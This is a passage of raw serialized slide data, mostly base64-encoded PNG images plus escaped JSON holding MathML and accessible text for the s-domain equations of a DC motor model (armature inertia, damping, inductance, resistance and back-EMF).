F9/lKGqCbDj8vZ75mee87sb+MbI64X/lxO6WMgQY/F771zyJsSbmPvzOeqwSCBNWR9DJt5utKMwid2SfUfCEzN2dZR1Kev5d4Fp6FZ+FZjnWNIIHf/K649iJfY76U6vZERpfRZYA28Uqh5+ZMsjNK3zvg8bUyF8Hz8LyG8lQhTlcclJu0xdGfOfJ7X2AQfSrl+vOepj03xSiKHAY9S9x8ndrNl5Qy5jT4ufCpfxZlIOU+jgtUAUGC6hhVmP7D8L/NNhBFzg1Yn/L8TeJZeBaehWdZgCBBs+9d3oPyDkk1hxWjy+gyQNvoV3rZ1nDM/U7xt+a5n+fhtTIXwfPwvIayUClkLvbOepNQ3tccYjgu+ZbjDqZc+98FrvGiom3nFsg/Kd+HBe/PLEXdm4wv/dMGcyX94CQoH4IE1fFBkpeBHpPvhxQvL1hW2lcr03gWnoVn4VkWIEhQX9Yrrj3PhNQEuD9KdYcmosvoMkCbOKDQPPMideYQ132i876znl0ncxE8D89r+YRiWtxEvEZTyj2TMb/L4e8WZ7z5r1OufWXO61upFP15jkTuc8H7k7Zn91TDRc6H/lnWJG1aoAoIElTD6pSBuzmYeDL87yFLZdrSUjwLz8Kz8CxoHn0K7c2zNd0FcXMwI7qMLqPLAD+iOV/mTs9vnokusODLNjXMRfA8PK/hnjeqeAgfOCp7SPEQDWS8kVkPxEjbA3S0wPVdU4rcbA9ePEWxOSX/Lw0XOR/6p02mxV1EHvJBkKAajiW0+60g3Rd7S041Wp1FS/EsPAvPwrOgmaRtO/EtY34rIp6jNSVfE7qMLgO0BfN8flWMo4/3/O4X5fh7zJPrZC6C5+F5Dfe8D4qH8KSjsvsUQnrX4bUPKG583ijoIkXeRYVotriNbm1Lyf9Tw0Wu6v5pm6mUa9nI2K50CBJUw98J7f48/L/GG21ta5Gm1c/xLDwLz8KzoPWMKzS4P0N+d6X4fsBFQZfRZYC2kLYFz0xaHfHbG8rfDlZ8jcxF8Dw8r+Get0YpRj87rMN5RflHHZV93WEHPqps2yL7ns0Xt5HQnSn5f2yB2VfZP22TdojOVoFu2rC3c18L76sZHH5TtI3NA5JWiJ0vbvAsPAvPwrOgufyleH61/b73RYXNwDe6jC6jy9n42MA5xFVu6w+cUbRbnOb9JOkvJLN8WOQK5iJ4Hp7XcM87rriBrqNdSxSCaF7o2F4eu1xx7dsL5P9AKXIjBcpIi1YX3VNtNyJXWf+sQuS2C2Tp/wQJ6skWRbs8slzmDsm27BjPwrPwLDwL2sdehQbvU+Rjluf37he939OxFLqMLrcBggTt4Imi3ZK2Mj2jbPsDFV0fcxE8D89rgefdUzyEoyXU47SiHub06EUWy0z7WuddgbzNIc/TSpHb4/DF03NErrb9swqR28HYLlP/J0hQTy4o2mWt5TLPSvGlingWnoVn4VnQbDYpnt1hRT4nen7zxOOxFLqMLrcBggTNZ76y3YYS8pgn6WfTmPReih3cy/sz5iJ4Hp4XyWzlg7inhLoYUXijqMt9S+Vp9so6XyD/baI32KUFyjkobgM8iFw1/ROR8wOCBM3keUqb3HJQZlJAflI6X33iWXgWnoVnQbvpUzy34yl5LIl4dlZ5PJZCl9HlNkCQgHnjTEp7KXpAmc/ZCvyJuQieh+c13PN2KB/Csvav3KSszzkLZWmW864rkL92qdiLgtcx4tg8diFylfRPRK5egz2CBPVhsaJNVlsu03zpM11wMIpn4Vl4Fp4F7SCt3/+b8vsrPX9/seLrQZfRZSBI0AZGFG2m/Ur9mSIvs13LQInXx1wEz8PzWuB5f1kUMlv8qexIGwqWc7PgADyNMeV1nClYzt8p+W8rmP92affp7FX1z6pEbptANwQJ2ndP71QwqN6JZ+FZeBaeBRByO6Xfm6Bz3OqzNfLjlhTzK74edBldBoIEbeC9os0uKPMaVN6DsRKvj7kInofntcDzJhQ364+S62ReWD0X3f5VefdhMwPrbyn5Xyl4Hf8oH4blBcuZTJlEFH0BmHbA55eWiVwZ/bNKkdvC+K50klZ0gX1GKxigJA1G30v6VkN4Fp6FZ+FZ0B6uKJ7ZFTG/7T00c68H14Muo8sATWe1chyd5fm4ocxzsITrYy6C5+F5LfC8AeVDuLmCuv0knQhbWt3y7nm2QZH3zoLXMKUo46Hje/jAwr1YkVLGVAsHAa77p0smU+q8njFe6RAkKJekr3z+cVDe0pRn7jSehWfhWXgWQBf7FM9r1PL2PT1/88iT60GX0WWApnNMdNsDzcqQ54ByfF7Gzh/MRfA8PK8FnndQcZMmMwqZTXYq6mcifcty5H1EkfeCAnWfLboATNGve4ZS8j9q4T5oDlBrIy77p0vSDiqfyxivdAgSlEfaVz7HHJT5e0J5X5Veg2fhWXgWngXtYavieT3S8xvzLLzreZ5XenI96DK6DNB07iie59s58j2rHKMfcHx9zEXwPDyvBZ6n2fNrvOI6XlXU8bKDfCcK1nueot7mpO+iAZiRlAdssaX7kLbEpq+lQueqf7pilkKUoXwIEpTHsZT+v9ByefNS9POMJa3Bs/AsPAugOSxQPKvDPb85LX4dVowuo8sAbcG84P6meJaP5xyjv1Pk/V7cbtXCXATPw/Ma7nnmYr8qbtDBius5XyGKRpAXZcw37UCw6yWI3H4L7fNG7Eaq47iXci3LWipyrvqnK+ak1PUtY7xKIEhQHknaf8tBeacsDebxLDwLz8KztOwW3dd4dU4LW3Af07Zd6P6Qq3dLCh8OK0aX0WUA5nL/Taty5n9Amf/ZiuZQzEXwPDyvAWhOS7cZSSvCkKKuhzLm+VbsR3mziJyNfePS9jqzefhmWsSvzQdUueifrvhJ/F45xMCSIIFL0r7ysX24o3mJlfQVyRCehWfhWXiWAwgSNIO0Fwzvu/523LGfocvoMroMEM+fimf4Q8EynonuzIMBR9fIXATPw/Ma7nlnFDfmgUf1fZpS1xsZ80s7fGJHwfqmRZxsHG5xyrGIdpN2fsVOaTe2+6crtqTU8wJjvEogSFB9/58W+0t0LyaU9zeehWfhWXiWIwgSNIO0FwzGt8zK8N4Pvx56ej3oMroM0FReKXzrasEyNB/5mjTm6BqZi+B5eF7DPe+JQmAOWyqrz4Iwbk6p678Z85suQYTi8h6x1K4vHYp0L+vE722pmtY/XZF2WMwuxniVQJCgHM4ntPN9y2UlHZBsviTKukoPz8Kz8Cw8SwtBgmbwq+i2rujWVp8OK0aX0WWANjCg9K0hC2WNKcsadHCdzEXwPDyvwZ43X3RbDdkagK+19BJmIqG+U5YEyOYJ1VFnPnyy1K5rE+r+1EGfmSXJe6MO1/h58LF/umK/sDeejxAkKIekZbonLOtlUlmbLQ6a8Sw8C8+CXggSNH9s0B3g7v7v8x5fD7qMLgM0kbQvxm361oCkn1fj4qt45iJ4Hp7nueeZKOTNIL2QTjQxa1RSM3m46WCQOyXFTiM/Lcn7r2UhTVxnORK5/ZbadFjKjRxL2CeauBeXj/3TFZdEt7ct+PMiAOywUMr74uZkQjmncuaJZ+FZeBaeZXOcT5DAf/oztomPhxWjy+gyQNPRfN1v86X9WaUnHLB8ncxF8Dw8z1PPuxxTwbui3095RCEqNg/t6I6uriuQz4aE+n7NmNenlOsvylaJ3zu0KEsk/vDN6w773mHxfzlQU/qnK8YT6niNMV7lRkuQwB27UwYhsyyV87PEL8ctos94Fp6FZ+FZ0D40X4z6fFgxuowuAzQZM05O26vfpD8slmne+b0XXeDY5nlrzEXwPDzPQ8/bmPJgaiuZJiq2lyd1R+2KnHreZ7HOtx2L3OOIPL9Yas8LEr/Ptcsvq5K+aDICPrumIudj/3RF0qFKQwJVQZDAPdcS2viJpTIWBemtxB9UXEQj8Sw8C8/Cs6B9aM6Q8/mwYnQZXQZoMhuUGr3ZcrmHleWetVgmcxE8D8/z0PNuKISgPyWP1Yo89lmu97jFQaytKM4Fcbdcaigmz0kLbblC4r9S3V5CH3yc0Ga/1FTkfOyfLpiV0HdMZH0O47zKIEjgnqTg+FUL+ZtB3oOY/O9YeL7wLDwLz8KzoH2Miu4cuZU1uiZ0GV0GaArnFBptc8Vy97M4oSx7wFKZzEXwPDzPQ8/7rBCCrSl5HEv5/YSDevce4PhTgZtkK4qzPaUdluSso/mS9ENCvkWjhQ9j8i3roLKjCdd2uKYi52P/dEHSYT03BaqEIIFbVqXo/TGHL3LMs9VnIX88C8/Cs/AsaB8nFHO/8zW7JnQZXQZoCk8VGn3PUdna1QS2nk3mIngenueh52n2pUw7S+Beyu93llDvvHuyDUh8hHFOjg75UfIHW+LyTGvfIoeixE0UbpXYB42Ix0XTRmsqcj72TxfsS+iXOxjjVQpBguoGZzZ8L+4grAsWrwHPwrPwLDwLGB/0pndid89pdBldRpcBdCwV3Uv6K47Kn5+gpTbmCcxF8Dw8rwae90UhAH05O6irKGfUPlPmEIo8kca9MfX+PWfdziS0xakc+V3pyeNTxMujcznruimmnvcreIDi9vb+WEOB87l/2uZ6wgRzloCvLwGgOLccDZxnS/QKgkmxv20fnoVn4Vl4FrSPFSn+Vdc94NFldBmg7pwU3Qv6YYd1eKaswxuxE1BmLoLn4Xmeed4dhQAkcUqST49e5qDOgzHl3ciR14OYGzQ/Z93mhb+Pqt+LjHldinhJNBg+RN17Yb+X7FtPmL3KogJEpj/MraAfJi27WVMzkfO5f9ombk/2k4zxKocggVu+if3DxBZL9PJV4x2u9obGs/AsPAvPgnaRtB/uwxpfF7qMLgPUmbkJY/Iyv1p/rqyDre1RmIvgeXieZ553SPHwL4j5rTm1+1PC7w45qvMusbMP9G6JPqhrY8H6bZJiX5fOlx+/Up3seem0X/JHQ802GF8j6jYi1Z6GHre32+maiZzv/dMWcV+iTSZoBpQHQQK3pK3Cy3po1d4IPzWBiDPi/qsCPAvPwrMA2sVLqf9hxegyugzQFOJWEicdLv+zg3pszVCHmWS+jC76FT1zETwPz/MIE0F7nfLgxx1+cTvhN5cc1vnXlPqeVbxU2R7xoJsXMrb2gYoLvpgo1pIUYX7T8xsTbVof8bc3JFtQxgR1rkTU6UsomlUTZw4vaiZydeifNohbRXROwAcIErjlSMpzrv3ywTzrUct6x6Wzp2JZ4Fl4Fp4F0B6iXkadb8B1ocvoMkCdMC+394UalfXl/NdQC1ZbqMfq0AOmc9RjZuuh49J5CcpcBM/D8xrgeesk+atI828H5PuSHLN85X7C3//luL5X5b+RIVO/3oMu/gkf+mU9D7npJFHBjddhO9hkV0y7mpPWD8r3JS/mXIc9Eh0JvBn+exQmYnsr4sXSxq6HyCzf2haky9KJUPXmPyadA3J84bHUf8lUXfpnUaK+QjNfQvPljx8QJHDPLkleFjwWDt5mvNPocn94by4G6a38+KXDqKXBPp6FZ+FZeBZAHGel/ocVo8voMkAdWRuOfyck/0v53mT04Wk4j9CsMBgJx+QTEdpioy5Gh80L+V+Yi+B5eF59PW+d6PdAi0vmAveWUNdx+X5y9/yeTmIisQ8y1NkIzknJvieZlv5QhLMagDnweYOyjMPhdWRZnjYaGpRvrJfyV6a0uX/avk/HBHyBIEE5mCWm+0PNzjvQfxE+5/0eXA+ehWfhWQDNp3dJ/u4GXRu6jC4D1HWOZiNp9HzKcR1mUp53g8xF8Dw8zyPMDTFflnzK+ECaE7TNvsllRUBeSScKk7TkZGbJ1BPpLDuZCtPnIN2VzmqHLVLeCdLmQEoT+TIR1X+lE5XsrpMRtauhkOY5xdtch1liYyKe98M8Z/I3128iy+YE9CHx/+uMqBO/p0KRqAN17J9ZuRFxj156XF8GoAQJysAMRsyXJ6fDQc6DHi2eCv3SfO0wHA7i+z29FjwLz8KzAJrLup4XK00DXUaXAaDeMBfB8/A8jzBfRu4IH5h7PQ+MeTjNioPx8CZtwszBMkbko5aZnaFpvGClRL94XkvTeAVBAgA8C/AsgChmhXM6k5ajy4AuAwDgeYDnAfhK1OElJmK4mKapnFsYUC0gSACAZwGeBYAuo8voMgAAngd4HkCtiToc+wrNUimbI+6JOSyH1UT+YZZPTsUkAMCz8CwAQJcBXQYAwPMAzwPwHrNX98eIh+oXmqYS5gXpjfx4MMxSmgYAAM/CswAAXQZ0GQAAzwM8D8AFWyJEbiJIc2ma0hnuuQ/fgrSBZgEAwLPwLABAlwFdBgDA8wDPA3DJyQihG6ZZSmUo4h7soVkAAPAsPAsA0GVAlwEA8DzA8wDK4BoPWWWsls6hN91tf4xmAQDAs/AsAECXAV0GAMDzAM8DKAtzsMedngfNHMC6jqZxyuIgvetp95M0CwAAnoVnAQC6DOgyAACeB3geQNnMCdI9+fHgj36axgkLgvSsp72P0ywAAHgWngUA6DKgywAAeB7geQBVCt3tngfvVZAW0TRWMSexP+pp5wM0CwAAnoVnAQC6DOgyAACeB3gegA9c7XkAnwdpIc1iTeDud7XtlyBtoVkAAPAsPAsA0GVAlwEA8DzA8wB84kSE0BERLYZZItUdAZ0I0gqaBQAAz8KzAABdBnQZAADPAzwPwEc2S2dfte6lU0tollyYdnvZ1ZZjQZpPswAA4Fl4FgCgy4AuAwDgeYDnAfiMOUH8btfDaU4TX0WzZGKVfD+F/WuQDtIkAAB4Fp4FAOgyoMsAAHge4HkAdeJQkD53Cd0cmkTFXOnsm2bazSyVGqBJAADwLDwLANBlQJcBAPA8wPMA6kh/kK4HaQ9NkYkLQTpMMwAA4Fl4FgCgy+gyugwAgOdBuzzv/wwSXjz2XSKqAAABsHRFWHRNYXRoTUwAPG1hdGggeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTgvTWF0aC9NYXRoTUwiPjxtc3R5bGUgbWF0aHNpemU9IjE2cHgiPjxtaT5KPC9taT48bWk+czwvbWk+PG1pPiYjeDNDOTs8L21pPjxtZmVuY2VkPjxtaT5zPC9taT48L21mZW5jZWQ+PG1vPiYjeEEwOzwvbW8+PG1vPis8L21vPjxtbz4mI3hBMDs8L21vPjxtaT5iPC9taT48bWk+JiN4M0M5OzwvbWk+PG1mZW5jZWQ+PG1pPnM8L21pPjwvbWZlbmNlZD48bW8+JiN4QTA7PC9tbz48bW8+PTwvbW8+PG1vPiYjeDIwMDk7PC9tbz48bWk+VjwvbWk+PG1mZW5jZWQ+PG1pPnM8L21pPjwvbWZlbmNlZD48bW8+JiN4QTA7PC9tbz48bW8+LTwvbW8+PG1vPiYjeEEwOzwvbW8+PG1pPks8L21pPjxtaT4mI3gzQzk7PC9taT48bWZlbmNlZD48bWk+czwvbWk+PC9tZmVuY2VkPjwvbXN0eWxlPjwvbWF0aD5XTJOyAAAAAElFTkSuQmCC\&quot;,\&quot;slideId\&quot;:282,\&quot;accessibleText\&quot;:\&quot;J s omega open parentheses s close parentheses space plus space b omega open parentheses s close parentheses space equals thin space V open parentheses s close parentheses space minus space K omega open parentheses s close parentheses\&quot;,\&quot;imageHeight\&quot;:9.197596795727636},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;L&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mi&gt;I&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;R&lt;/mi&gt;&lt;mi&gt;I&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;V&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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